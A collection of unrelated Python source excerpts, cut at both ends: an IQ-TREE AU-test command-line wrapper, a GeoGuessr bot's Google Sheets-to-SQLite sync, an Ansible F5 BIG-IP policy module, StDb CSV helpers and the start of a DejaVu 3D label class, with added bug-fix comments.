        sys.exit(1)

    # Fall back to a random seed when none (or an invalid one) is given.
    try:
        seed = int(seed) if seed else random.randint(0, 1000000)
    except ValueError:
        warn('Invalid seed, generating seed using random number generator.')
        seed = random.randint(0, 1000000)

    aup, t1, t2 = _iqtree(exe, msa, tree, model, seed)

    if outfile:
        try:
            with open(outfile, 'w') as o:
                o.write('P-value: {:.4f}\n'
                        'Tree1: {}\n'
                        'Tree2: {}\n'.format(aup, t1, t2))
        except OSError as err:
            # Fixed: the original format string had a single placeholder but
            # two arguments, so the actual error (`err`) was silently
            # dropped from the log message.
            error('Save AU TEST result to {} failed due to:\n'
                  '\t{}'.format(outfile, err))
    return aup, t1, t2
def main():
    """Command-line entry point: parse arguments and run the AU test."""
    des = 'Perform topology test (AU test) over protein alignments.'
    epilog = """
    The minimum requirement for running iMC-aut is an executable of a AU test
    program, a multiple sequence alignment (MSA) file (in FASTA format), a tree
    file (in NEWICK format).
    If you only provide one tree in the tree file, a maximum-likelihood tree will
    be inferred and AU-TEST will be performed to test the difference between them.
    If a set of trees in NEWICK format was provided in the tree file, only these
    trees will be evaluated without reconstructing the ML tree. In both case, only
    the p-value of AU TEST for the first tree will be printed out.
    Without providing a output file path, AU test results will not be saved to
    local file system, but the results will be always printed out.
    """
    formatter = argparse.RawDescriptionHelpFormatter
    parse = argparse.ArgumentParser(description=des, prog='ProtParCon-aut',
                                    usage='%(prog)s EXE MSA TREE [OPTIONS]',
                                    formatter_class=formatter, epilog=epilog)
    parse.add_argument('EXE',
                       help='Path to the executable of the topology test (AU '
                            'test) program.')
    parse.add_argument('MSA',
                       help='Path to the alignment file in FASTA format.')
    parse.add_argument('TREE',
                       help='Path to the tree file or string in NEWICK format.')
    parse.add_argument('-m', '--model',
                       help='Name of the substitution model or filename of the '
                            'model file.')
    parse.add_argument('-o', '--output',
                       help='Path to the output file.')
    parse.add_argument('-s', '--seed',
                       help='The seed for initiating the random number '
                            'generator.')
    parse.add_argument('-v', '--verbose', action='store_true',
                       help='Invoke verbose or silent (default) process mode.')

    args = parse.parse_args()
    msa, tree, exe, model = args.MSA, args.TREE, args.EXE, args.model
    # BUG FIX: the option is registered as '-o/--output', so argparse stores
    # the value in args.output; args.out raised AttributeError.
    aup, t1, t2 = aut(exe, msa, tree, model=model, seed=args.seed,
                      outfile=args.output, verbose=args.verbose)
    print(aup)
    print(t1)
    print(t2)
# Run the CLI only when executed as a script (no side effects on import).
if __name__ == '__main__':
    main()
|
from __future__ import print_function
import httplib2
import sys, os
import re
from apiclient import discovery
from oauth2client import client
from oauth2client import tools
from oauth2client.file import Storage
import sqlite3
from .AddScoresToDatabase import convertTitle
# If modifying these scopes, delete your previously saved credentials
# at ~/.credentials/sheets.googleapis.com-python-quickstart.json
SCOPES = 'https://www.googleapis.com/auth/spreadsheets.readonly'
# OAuth client secret shipped next to this module.
CLIENT_SECRET_FILE = os.path.join(os.path.dirname(__file__), 'client_secret.json')
APPLICATION_NAME = 'GeoGuessr Tracker Bot'
# Parse oauth2client's standard CLI flags when argparse is available;
# fall back to None so get_credentials() uses the legacy tools.run() path.
try:
    import argparse
    flags = argparse.ArgumentParser(parents=[tools.argparser]).parse_args()
except ImportError:
    flags = None
def get_credentials():
    """Return valid user credentials obtained from local storage.

    If nothing has been stored, or if the stored credentials are invalid,
    the OAuth2 flow is completed to obtain new credentials.

    Returns:
        Credentials, the obtained credential.
    """
    cred_dir = os.path.join(os.path.expanduser('~'), '.credentials')
    if not os.path.exists(cred_dir):
        os.makedirs(cred_dir)
    credential_path = os.path.join(cred_dir,
                                   'sheets.googleapis.com-python-quickstart.json')

    store = Storage(credential_path)
    credentials = store.get()
    if credentials and not credentials.invalid:
        return credentials

    # No usable credentials on disk: run the OAuth2 flow to obtain new ones.
    flow = client.flow_from_clientsecrets(CLIENT_SECRET_FILE, SCOPES)
    flow.user_agent = APPLICATION_NAME
    if flags:
        credentials = tools.run_flow(flow, store, flags)
    else:  # Needed only for compatibility with Python 2.6
        credentials = tools.run(flow, store)
    print('Storing credentials to ' + credential_path)
    return credentials
def overwriteSeriesTitles():
    """Apply series-title overwrites from the spreadsheet to the database.

    Link to sheet:
    https://docs.google.com/spreadsheets/d/1BTO3TI6GxiJmDvMqmafSk5UQs8YDvAafIAv0-h16MOw/edit?usp=sharing
    """
    # Get credentials to be able to access the google sheets API
    print("Opening spreadsheet to get overwrites.")
    credentials = get_credentials()
    http = credentials.authorize(httplib2.Http())
    discoveryUrl = ('https://sheets.googleapis.com/$discovery/rest?'
                    'version=v4')
    service = discovery.build('sheets', 'v4', http=http,
                              discoveryServiceUrl=discoveryUrl)

    # Basic info about the spreadsheet
    SHEET_ID = '16VxHWb7TwO4mICr42LIP8RuWRsr-rFD2040hUqdb_yY'
    RANGE_NAME = 'Overwrites!B2:C'

    # Fetch the overwrite rows from the spreadsheet
    result = service.spreadsheets().values().get(
        spreadsheetId=SHEET_ID, range=RANGE_NAME).execute()
    rows = result.get('values', [])

    database = sqlite3.connect(os.path.join(os.path.dirname(__file__), "database.db"))
    cursor = database.cursor()

    # Update each series found in the spreadsheet; rows missing a column
    # are skipped.
    for row in rows:
        try:
            submission_id, raw_title = row[0], row[1]
        except IndexError:
            continue
        new_title = convertTitle(raw_title)
        if new_title == '':
            continue
        count = cursor.execute(
            "SELECT COUNT(*) FROM ChallengeRankings WHERE SubmissionID = ?",
            [submission_id]).fetchone()[0]
        if count == 1:
            cursor.execute(
                "UPDATE ChallengeRankings SET SeriesTitle = ? WHERE SubmissionID = ?",
                [new_title, submission_id])
    database.commit()
    database.close()
def overwriteBlacklistedUsers():
    """Rebuild the BlacklistedUsers table from the spreadsheet.

    Link to sheet:
    https://docs.google.com/spreadsheets/d/1KAPNJKmc5o5pbCs1cmjymLRMHPAyb2_uX0Dqbcf2sUw/edit?usp=sharing
    """
    print("Opening spreadsheet to get blacklisted users.")
    credentials = get_credentials()
    http = credentials.authorize(httplib2.Http())
    discoveryUrl = ('https://sheets.googleapis.com/$discovery/rest?'
                    'version=v4')
    service = discovery.build('sheets', 'v4', http=http,
                              discoveryServiceUrl=discoveryUrl)

    # Basic info about the spreadsheet
    SHEET_ID = '1KAPNJKmc5o5pbCs1cmjymLRMHPAyb2_uX0Dqbcf2sUw'
    RANGE_NAME = 'Blacklist!A2:A'

    result = service.spreadsheets().values().get(
        spreadsheetId=SHEET_ID, range=RANGE_NAME).execute()
    rows = result.get('values', [])
    print(rows)

    # Recreate the table from scratch so users removed from the sheet are
    # un-blacklisted.
    database = sqlite3.connect(os.path.join(os.path.dirname(__file__), "database.db"))
    cursor = database.cursor()
    cursor.execute("DROP TABLE IF EXISTS BlacklistedUsers")
    cursor.execute("CREATE TABLE BlacklistedUsers (Username PRIMARY KEY)")
    for row in rows:
        try:
            username = row[0]
        except IndexError:
            continue
        print('Adding blacklisted user "' + username + '"')
        cursor.execute("INSERT OR REPLACE INTO BlacklistedUsers VALUES (?)", [username])
    database.commit()
    database.close()
# When run directly, only the blacklist sync runs; series-title overwrites
# (overwriteSeriesTitles) must be invoked separately.
if __name__ == '__main__':
    overwriteBlacklistedUsers()
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
#
# Copyright 2017 F5 Networks Inc.
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
# Standard Ansible module metadata consumed by ansible-doc and CI tooling.
ANSIBLE_METADATA = {
    'status': ['preview'],
    'supported_by': 'community',
    'metadata_version': '1.0'
}
DOCUMENTATION = '''
---
module: bigip_policy
short_description: Manage general policy configuration on a BIG-IP.
description:
- Manages general policy configuration on a BIG-IP. This module is best
used in conjunction with the C(bigip_policy_rule) module. This module
can handle general configuration like setting the draft state of the policy,
the description, and things unrelated to the policy rules themselves.
It is also the first module that should be used when creating rules as
the C(bigip_policy_rule) module requires a policy parameter.
version_added: "2.4"
options:
description:
description:
- The description to attach to the Partition.
required: False
default: None
name:
description:
- The name of the policy to create.
required: True
state:
description:
- When C(state) is C(present), ensures that the policy exists and is
published. When C(state) is C(absent), ensures that the policy is removed,
even if it is currently drafted. When C(state) is C(draft), ensures that
the policy exists and is drafted.
required: False
default: present
choices:
- present
- absent
- draft
strategy:
description:
- Specifies the method to determine which actions get executed in the
case where there are multiple rules that match. When creating new
policies, the default is C(first).
default: None
required: False
choices:
- first
- all
- best
- Custom strategy
notes:
- Requires the f5-sdk Python package on the host. This is as easy as
pip install f5-sdk
requirements:
- f5-sdk
extends_documentation_fragment: f5
author:
- <NAME> (@caphrim007)
'''
EXAMPLES = '''
vars:
policy_rules:
- name: rule1
actions:
- forward: "yes"
select: "yes"
pool: "pool-svrs"
conditions:
- http_uri: "yes"
path: "yes"
starts-with:
- /euro
ordinal: 8
- name: HomePage
actions:
- forward: yes
select: yes
pool: "pool-svrs"
conditions:
- http-uri: yes
path: yes
starts-with:
- /HomePage/
ordinal: 4
- name: Create policies
bigip_policy:
name: "Policy-Foo"
state: present
delegate_to: localhost
- name: Add a rule to the new policy
bigip_policy_rule:
policy: "Policy-Foo"
name: "ABC"
ordinal: 11
conditions:
- http_uri: "yes"
path: "yes"
starts_with:
- "/ABC"
actions:
- forward: "yes"
select: "yes"
pool: "pool-svrs"
- name: Add multiple rules to the new policy
bigip_policy_rule:
policy: "Policy-Foo"
name: "{{ item.name }}"
ordinal: "{{ item.ordinal }}"
conditions: "{{ item.conditions }}"
actions: "{{ item.actions }}"
with_items:
- policy_rules
'''
import re
from ansible.module_utils.f5_utils import *
from distutils.version import LooseVersion
from icontrol.exceptions import iControlUnexpectedHTTPError
class Parameters(AnsibleF5Parameters):
    """Maps module parameters to LTM policy REST attributes.

    NOTE(review): ``self.api_map``, ``self._values``, ``self.partition`` and
    ``self._filter_params`` are not defined in this class; they are
    presumably provided by AnsibleF5Parameters -- confirm.
    """
    # Attributes exchanged with the REST API, plus the subsets that may be
    # updated and that are reported back to the user.
    api_attributes = ['strategy', 'description']
    updatables = ['strategy', 'description']
    returnables = ['strategy', 'description']

    def to_return(self):
        # Collect user-visible result values, dropping unset entries.
        result = {}
        for returnable in self.returnables:
            result[returnable] = getattr(self, returnable)
        result = self._filter_params(result)
        return result

    def api_params(self):
        # Build the kwargs dict for REST calls, translating attribute names
        # through api_map when a mapping exists for them.
        result = {}
        for api_attribute in self.api_attributes:
            if self.api_map is not None and api_attribute in self.api_map:
                result[api_attribute] = getattr(self, self.api_map[api_attribute])
            else:
                result[api_attribute] = getattr(self, api_attribute)
        result = self._filter_params(result)
        return result

    @property
    def strategy(self):
        # Normalize the strategy to a full path such as '/Common/first-match'.
        if self._values['strategy'] is None:
            return None
        # Look for 'first' from Ansible or REST
        elif self._values['strategy'] == 'first':
            return self._get_builtin_strategy('first')
        elif 'first-match' in self._values['strategy']:
            return str(self._values['strategy'])
        # Look for 'all' from Ansible or REST
        elif self._values['strategy'] == 'all':
            return self._get_builtin_strategy('all')
        elif 'all-match' in self._values['strategy']:
            return str(self._values['strategy'])
        else:
            # Look for 'best' from Ansible or REST
            if self._values['strategy'] == 'best':
                return self._get_builtin_strategy('best')
            elif 'best-match' in self._values['strategy']:
                return str(self._values['strategy'])
            else:
                # These are custom strategies. The strategy may include the
                # partition, but if it does not, then we add the partition
                # that is provided to the module.
                return self._get_custom_strategy_name()

    def _get_builtin_strategy(self, strategy):
        # e.g. 'first' -> '/<partition>/first-match'.
        return '/{0}/{1}-match'.format(
            self.partition, strategy
        )

    def _get_custom_strategy_name(self):
        # Accept '/Partition/name' as-is; bare names get the module partition.
        strategy = self._values['strategy']
        if re.match(r'(\/[a-zA-Z_0-9.-]+){2}', strategy):
            return strategy
        elif re.match(r'[a-zA-Z_0-9.-]+', strategy):
            return '/{0}/{1}'.format(self.partition, strategy)
        else:
            raise F5ModuleError(
                "The provided strategy name is invalid!"
            )

    @strategy.setter
    def strategy(self, value):
        # Store the raw value; normalization happens in the property getter.
        self._values['strategy'] = value
class BaseTrafficPolicyManager(object):
    """Shared behavior for the simple and complex policy managers.

    NOTE(review): the subclasses' exec_module() dispatch state=absent to
    self.absent(), but no absent() is defined in this class or in the
    subclasses visible in this file -- confirm it is provided elsewhere.
    """
    def __init__(self, client):
        # client: AnsibleF5Client wrapper exposing the API and module params.
        self.client = client
        self.have = None
        self.want = Parameters(self.client.module.params)
        self.changes = Parameters()

    def _set_changed_options(self):
        # On create, every explicitly-requested option counts as a change.
        changed = {}
        for key in Parameters.returnables:
            if getattr(self.want, key) is not None:
                changed[key] = getattr(self.want, key)
        if changed:
            self.changes = Parameters(changed)

    def _update_changed_options(self):
        # Diff desired state (want) against device state (have); True when
        # any updatable attribute differs.
        changed = {}
        for key in Parameters.updatables:
            if getattr(self.want, key) is not None:
                attr1 = getattr(self.want, key)
                attr2 = getattr(self.have, key)
                if attr1 != attr2:
                    changed[key] = attr1
        self.changes = Parameters(changed)
        if changed:
            return True
        return False

    def present(self):
        # Ensure the policy exists, creating or updating as required.
        if self.exists():
            return self.update()
        else:
            return self.create()

    def should_update(self):
        result = self._update_changed_options()
        if result:
            return True
        return False

    def _validate_creation_parameters(self):
        # New policies default to the 'first' match strategy.
        if self.want.strategy is None:
            self.want.strategy = 'first'
class SimpleTrafficPolicyManager(BaseTrafficPolicyManager):
    """Manages policies on BIG-IP versions < 12.1.0 (no draft/publish workflow)."""

    def exec_module(self):
        """Run the requested state change and return the Ansible result dict."""
        changed = False
        result = dict()
        state = self.want.state

        try:
            if state == "present":
                changed = self.present()
            elif state == "absent":
                changed = self.absent()
        except iControlUnexpectedHTTPError as e:
            raise F5ModuleError(str(e))

        changes = self.changes.to_return()
        result.update(**changes)
        result.update(dict(changed=changed))
        return result

    def read_current_from_device(self):
        """Load the policy's current attributes from the device."""
        resource = self.client.api.tm.ltm.policys.policy.load(
            name=self.want.name,
            partition=self.want.partition
        )
        result = resource.attrs
        return Parameters(result)

    def exists(self):
        """Return True when the policy exists on the device."""
        return self.client.api.tm.ltm.policys.policy.exists(
            name=self.want.name,
            partition=self.want.partition
        )

    def update_on_device(self):
        """Push the desired attributes onto the existing policy."""
        params = self.want.api_params()
        resource = self.client.api.tm.ltm.policys.policy.load(
            name=self.want.name,
            partition=self.want.partition
        )
        resource.modify(**params)
        return resource

    def create_on_device(self):
        """Create the policy on the device (it must not exist yet)."""
        params = self.want.api_params()
        self.client.api.tm.ltm.policys.policy.create(
            name=self.want.name,
            partition=self.want.partition,
            **params
        )

    def remove_from_device(self):
        """Delete the policy from the device."""
        resource = self.client.api.tm.ltm.policys.policy.load(
            name=self.want.name,
            partition=self.want.partition
        )
        resource.delete()

    def absent(self):
        """Ensure the policy is removed.

        BUG FIX: exec_module() dispatches state=absent to absent(), but no
        such method existed anywhere in the hierarchy (AttributeError).
        """
        if self.exists():
            return self.remove()
        return False

    def remove(self):
        if self.client.check_mode:
            return True
        self.remove_from_device()
        if self.exists():
            raise F5ModuleError("Failed to delete the policy")
        return True

    def create(self):
        self._validate_creation_parameters()
        self._set_changed_options()
        if self.client.check_mode:
            return True
        # BUG FIX: this used to call update_on_device(), which load()s the
        # policy -- load fails here because the policy does not exist yet.
        self.create_on_device()
        return True

    def update(self):
        self.have = self.read_current_from_device()
        if not self.should_update():
            return False
        if self.client.check_mode:
            return True
        self.update_on_device()
        return True
class ComplexTrafficPolicyManager(BaseTrafficPolicyManager):
    """Manages policies on BIG-IP >= 12.1.0, where changes are made on a
    draft copy that is then published (unless state=draft is requested).
    """

    def exec_module(self):
        """Run the requested state change and return the Ansible result dict."""
        changed = False
        result = dict()
        state = self.want.state

        try:
            if state in ["present", "draft"]:
                changed = self.present()
            elif state == "absent":
                changed = self.absent()
        except iControlUnexpectedHTTPError as e:
            raise F5ModuleError(str(e))

        changes = self.changes.to_return()
        result.update(**changes)
        result.update(dict(changed=changed))
        return result

    def should_update(self):
        # An update is needed when attributes differ OR the draft/published
        # status does not match the requested state.
        result = self._update_changed_options()
        drafted = self.draft_status_changed()
        if any(x is True for x in [result, drafted]):
            return True
        return False

    def draft_status_changed(self):
        # True when the current draft/published status disagrees with the
        # requested state.
        if self.draft_exists() and self.want.state == 'draft':
            drafted = False
        elif not self.draft_exists() and self.want.state == 'present':
            drafted = False
        else:
            drafted = True
        return drafted

    def present(self):
        """Ensure the policy exists, as draft or published per state."""
        if self.draft_exists() or self.policy_exists():
            return self.update()
        else:
            return self.create()

    def absent(self):
        """Ensure neither a draft nor a published policy remains.

        BUG FIX: exec_module() dispatches state=absent to absent(), but no
        such method existed anywhere in the hierarchy (AttributeError).
        """
        if self.draft_exists() or self.policy_exists():
            return self.remove()
        return False

    def remove(self):
        if self.client.check_mode:
            return True
        self.remove_from_device()
        if self.draft_exists() or self.policy_exists():
            raise F5ModuleError("Failed to delete the policy")
        return True

    def remove_from_device(self):
        # Delete the draft copy first (if any), then the published policy.
        if self.draft_exists():
            resource = self.client.api.tm.ltm.policys.policy.load(
                name=self.want.name,
                partition=self.want.partition,
                subPath='Drafts'
            )
            resource.delete()
        if self.policy_exists():
            resource = self.client.api.tm.ltm.policys.policy.load(
                name=self.want.name,
                partition=self.want.partition
            )
            resource.delete()

    def read_current_from_device(self):
        """Load current attributes, preferring the draft copy when present."""
        if self.draft_exists():
            resource = self.client.api.tm.ltm.policys.policy.load(
                name=self.want.name,
                partition=self.want.partition,
                subPath='Drafts'
            )
        else:
            resource = self.client.api.tm.ltm.policys.policy.load(
                name=self.want.name,
                partition=self.want.partition
            )
        result = Parameters(resource.attrs)
        return result

    def policy_exists(self):
        # True when a *published* policy with this name exists.
        params = dict(
            name=self.want.name,
            partition=self.want.partition
        )
        result = self.client.api.tm.ltm.policys.policy.exists(**params)
        return result

    def draft_exists(self):
        # True when a draft copy exists under the 'Drafts' sub-path.
        params = dict(
            name=self.want.name,
            partition=self.want.partition,
            subPath='Drafts'
        )
        result = self.client.api.tm.ltm.policys.policy.exists(**params)
        return result

    def _create_new_policy_draft(self):
        # Create a brand-new policy directly in draft state.
        params = dict(
            name=self.want.name,
            partition=self.want.partition,
            subPath='Drafts',
            strategy=self.want.strategy
        )
        self.client.api.tm.ltm.policys.policy.create(**params)
        return True

    def _create_existing_policy_draft(self):
        # Put an already-published policy into draft state.
        params = dict(
            name=self.want.name,
            partition=self.want.partition,
        )
        resource = self.client.api.tm.ltm.policys.policy.load(**params)
        resource.draft()
        return True

    def update_on_device(self):
        """Push the desired attributes onto the draft copy."""
        params = self.want.api_params()
        resource = self.client.api.tm.ltm.policys.policy.load(
            name=self.want.name,
            partition=self.want.partition,
            subPath='Drafts'
        )
        resource.modify(**params)

    def publish(self):
        """Publish the draft copy, making it the live policy."""
        resource = self.client.api.tm.ltm.policys.policy.load(
            name=self.want.name,
            partition=self.want.partition,
            subPath='Drafts'
        )
        resource.publish()
        return True

    def create(self):
        self._validate_creation_parameters()
        self._set_changed_options()
        if self.client.check_mode:
            return True
        if not self.draft_exists():
            self._create_new_policy_draft()
        # Because we always need to modify drafts, "creating on the device"
        # is actually identical to just updating.
        self.update_on_device()
        if self.want.state == 'draft':
            return True
        else:
            return self.publish()

    def update(self):
        self.have = self.read_current_from_device()
        if not self.should_update():
            return False
        if self.client.check_mode:
            return True
        if not self.draft_exists():
            self._create_existing_policy_draft()
        if self._update_changed_options():
            self.update_on_device()
        if self.want.state == 'draft':
            return True
        else:
            return self.publish()
class ModuleManager(object):
    """Dispatches to the policy manager matching the device's TMOS version."""

    def __init__(self, client):
        self.client = client

    def exec_module(self):
        """Select and run the manager appropriate for the software version."""
        if self.version_is_less_than_12():
            manager = self.get_manager('simple_traffic')
        else:
            manager = self.get_manager('complex_traffic')
        return manager.exec_module()

    def get_manager(self, type):
        """Return a policy manager instance for the given type string."""
        # BUG FIX: exec_module() requests 'simple_traffic', but this method
        # previously matched 'traffic', so pre-12.1.0 devices received None
        # and crashed with AttributeError on .exec_module().
        if type == 'simple_traffic':
            return SimpleTrafficPolicyManager(self.client)
        elif type == 'complex_traffic':
            return ComplexTrafficPolicyManager(self.client)

    def version_is_less_than_12(self):
        """Return True when TMOS is older than 12.1.0.

        NOTE(review): despite the name, the cutoff is 12.1.0 -- the
        draft/publish policy workflow appeared in 12.1.
        """
        version = self.client.api.tmos_version
        if LooseVersion(version) < LooseVersion('12.1.0'):
            return True
        else:
            return False
class ArgumentSpec(object):
    """Declares the Ansible argument spec for the bigip_policy module."""

    def __init__(self):
        self.supports_check_mode = True
        spec = {}
        spec['name'] = dict(required=True)
        spec['description'] = dict(required=False, default=None)
        spec['strategy'] = dict(required=False, default=None)
        spec['state'] = dict(
            required=False,
            default='present',
            choices=['absent', 'present', 'draft']
        )
        self.argument_spec = spec
        self.f5_product_name = 'bigip'
def main():
    """Build the Ansible client, run the module manager, report results."""
    if not HAS_F5SDK:
        raise F5ModuleError("The python f5-sdk module is required")

    spec = ArgumentSpec()

    client = AnsibleF5Client(
        argument_spec=spec.argument_spec,
        supports_check_mode=spec.supports_check_mode,
        f5_product_name=spec.f5_product_name
    )

    try:
        results = ModuleManager(client).exec_module()
    except F5ModuleError as e:
        client.module.fail_json(msg=str(e))
    else:
        client.module.exit_json(**results)
# Standard Ansible module entry point.
if __name__ == '__main__':
    main()
|
# Copyright 2019 <NAME>
#
# This file is part of StDb.
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
"""
Tools used in converting a pickled station database file to comma-separated value
(.csv) file. These functions are used in most scripts bundled with this package.
"""
from stdb import StDbElement
from obspy import UTCDateTime
def tocsv(stel=None):
    """
    Subroutine to output an StDbElement to a csv formatted string

    Parameters
    ----------
    stel : :class:`~stdb.classes.StDbElement`
        Instance of :class:`~stdb.classes.StDbElement` to convert to .csv

    Returns
    -------
    csvstr : str
        String representation of the csv content

    Raises
    ------
    ValueError
        If ``stel`` is not provided.
    """
    # BUG FIX: the default used to be the StDbElement *class* itself, which
    # is never a usable value; require a real instance instead.
    if stel is None:
        raise ValueError("tocsv() requires an StDbElement instance")
    csvstr = "{0:s}".format(stel.network)
    if len(stel.altnet) > 0:
        # BUG FIX: a ':' separator was missing between the network code and
        # the alternate network codes, which broke round-tripping through
        # fromcsv() (it splits the first field on ':').
        csvstr = csvstr + ":" + ":".join(stel.altnet)
    csvstr = csvstr + ",{0:s},".format(stel.station)
    csvstr = csvstr + ":".join(stel.location)
    csvstr = csvstr + ",{0:s},{1:10s},{2:8s},{3:10s},{4:8s},".format(
        stel.channel,
        stel.startdate.strftime("%Y-%m-%d"), stel.startdate.strftime("%H:%M:%S"),
        stel.enddate.strftime("%Y-%m-%d"), stel.enddate.strftime("%H:%M:%S"))
    csvstr = csvstr + "{0:f},{1:f},{2:f},{3:.0f},{4:f},{5:s}".format(
        stel.latitude, stel.longitude, stel.elevation, stel.polarity,
        stel.azcorr, stel.status)
    return csvstr
def fromcsv(line="", lkey=False):
    """
    Subroutine to convert a csv format string into an StDbElement

    Parameters
    ----------
    line : str
        Line to read as csv
    lkey : bool
        Parameter controlling the length of the key (with or without CHANNEL info)

    Returns
    -------
    key : str
        Key associated with each entry in database
    entry : :class:`~stdb.classes.StDbElement`
        Instance of :class:`~stdb.classes.StDbElement` class

    Returns ``(None, None)`` when the line has too few fields.
    """
    fields = line.split(',')
    if len(fields) <= 6:
        # Not enough fields to describe a station entry
        return None, None

    # Networks: first field is "NET" or "NET:ALT1:ALT2:..."
    nets = fields[0].split(':')
    net = nets[0]
    altnet = nets[1:]
    # Required Station Parameters
    stn = fields[1]
    # Required Location Parameters
    loc = fields[2].split(':')
    # Required Channel Parameters (band+instrument code only, e.g. "BH")
    chn = fields[3][0:2]
    # Required Timing Parameters
    # NOTE(review): the time-of-day fields (sttm/edtm) are parsed but never
    # used below; UTCDateTime only receives the dates -- confirm intended.
    stdt = fields[4]
    sttm = fields[5]
    eddt = fields[6]
    edtm = fields[7]
    # Required Position Parameters
    lat = float(fields[8])
    lon = float(fields[9])

    # Set Default values for Optional elements
    elev = 0.
    pol = 1.
    azcor = 0.
    # BUG FIX: status was only assigned when the line had exactly 14 fields,
    # so shorter lines raised NameError at the StDbElement() call below.
    status = ''
    if len(fields) >= 11:
        elev = float(fields[10])
    if len(fields) >= 12:
        pol = float(fields[11])
    if len(fields) >= 13:
        azcor = float(fields[12])
    if len(fields) >= 14:
        status = fields[13]

    # Create Key
    if lkey:
        key = "{0:s}.{1:s}.{2:2s}".format(net.strip(), stn.strip(), chn.strip())
    else:
        key = "{0:s}.{1:s}".format(net.strip(), stn.strip())

    # Create Element
    entry = StDbElement(network=net, altnet=altnet, station=stn, channel=chn, \
        location=loc, latitude=lat, longitude=lon, elevation=elev, polarity=pol, \
        azcorr=azcor, startdate=UTCDateTime(stdt), enddate=UTCDateTime(eddt), \
        restricted_status=status)
    return key, entry
|
<reponame>bio-hpc/metascreener<gh_stars>1-10
## Automatically adapted for numpy.oldnumeric Jul 23, 2007 by
########################################################################
#
# Date: May 2006 Authors: <NAME>, <NAME>
#
# <EMAIL>
# <EMAIL>
#
# The Scripps Research Institute (TSRI)
# Molecular Graphics Lab
# La Jolla, CA 92037, USA
#
# Copyright: <NAME>, <NAME> and TSRI
#
#########################################################################
#
# $Header$
#
# $Id$
#
import os
import numpy.oldnumeric as Numeric
import types
import math
import warnings
import Tkinter
import Pmw
from opengltk.OpenGL import GL
from opengltk.extent.utillib import glCleanRotMat
from mglutil.math import rotax
from mglutil.math.VectorModule import Vector
from mglutil.gui.BasicWidgets.Tk.thumbwheel import ThumbWheel
from DejaVu.Geom import Geom
from DejaVu.viewerFns import checkKeywords
from DejaVu import viewerConst
from DejaVu.colorTool import glMaterialWithCheck, resetMaterialMemory
from DejaVu.IndexedPolygons import IndexedPolygons
from pyglf import glf
class GlfLabels(Geom):
    """Class for sets of 3d labels
    """
    # Keywords handled by Set()/__init__ in addition to the base Geom ones.
    keywords = Geom.keywords + [
        'billboard',
        'font',
        'fontRotateAngles',
        'fontScales',
        'fontSpacing',
        'fontStyle',
        'fontTranslation',
        'labelTranslation',
        'includeCameraRotationInBillboard',
        'labels',
        ]

    # Bitmap (BMF) font files; all entries are currently disabled.
    bitmapFont3dList = [
#        'arbat.bmf',
#        'arial.bmf',
#        'brushtype.bmf',
#        'chicago.bmf',
#        'courier.bmf',
#        'cricket.bmf',
#        'crystal.bmf',
#        'fixedsys.bmf',
#        'gals.bmf',
#        'greek.bmf',
#        'impact.bmf',
#        'proun.bmf',
#        'techno.bmf',
#        'times_new.bmf'
        ]

    # Vector (GLF) font files shipped with pyglf.
    vectorFont3dList = [
        'arial1.glf',
        'courier1.glf',
        'crystal1.glf',
        'techno0.glf',
        'techno1.glf',
        'times_new1.glf',
        'aksent1.glf',
        'alpine1.glf',
        'broadway1.glf',
        'chicago1.glf',
        'compact1.glf',
        'cricket1.glf',
        'garamond1.glf',
        'gothic1.glf',
        'penta1.glf',
        'present_script1.glf']

    fontList = vectorFont3dList + bitmapFont3dList

    # Maps style names to the glf draw routine used in Draw().
    fontStyleDict = {
        'solid': glf.glfDrawSolidString,
        'solid3d': glf.glfDraw3DSolidString,
        'wire': glf.glfDrawWiredString,
        'wire3d': glf.glfDraw3DWiredString,
        }
    fontStyleList = fontStyleDict.keys()
    def __init__(self, name=None, check=1, **kw):
        """Initialize the label set, filling in defaults for all
        GlfLabels-specific keywords before delegating to Geom.__init__."""
        #print "GlfLabels::__init__"
        if not kw.get('shape'):
            kw['shape'] = (0,3)
        if not kw.get('labels'):
            kw['labels'] = ['Aa']
        if kw.get('billboard') is None:
            kw['billboard'] = True
        if kw.get('includeCameraRotationInBillboard') is None:
            kw['includeCameraRotationInBillboard'] = False
        if not kw.get('font'):
            kw['font'] = self.fontList[0]
        if not kw.get('fontStyle'):
            kw['fontStyle'] = 'solid'
        if not kw.get('fontSpacing'):
            kw['fontSpacing'] = .2
        if not kw.get('fontScales'):
            kw['fontScales'] = (1, 1, 1)
        if not kw.get('fontRotateAngles'):
            kw['fontRotateAngles'] = (0, 0, 0)
        if not kw.get('fontTranslation'):
            kw['fontTranslation'] = (0, 0, 0)
        if not kw.get('labelTranslation'):
            kw['labelTranslation'] = None

        # Glf initialisations
        glf.glfInit()
        # usefull glf messages (like "font not found")
        glf.glfEnable(glf.GLF_CONSOLE_MESSAGES)
        # we manage this through the opengl Z scale. (we have to make a call to glScale anyway)
        glf.glfSetSymbolDepth(.8) # .2 is C code default value (it is not deep enough)
        #contouring is far from being nice in the glf 1.4 C code! So we don't use it.
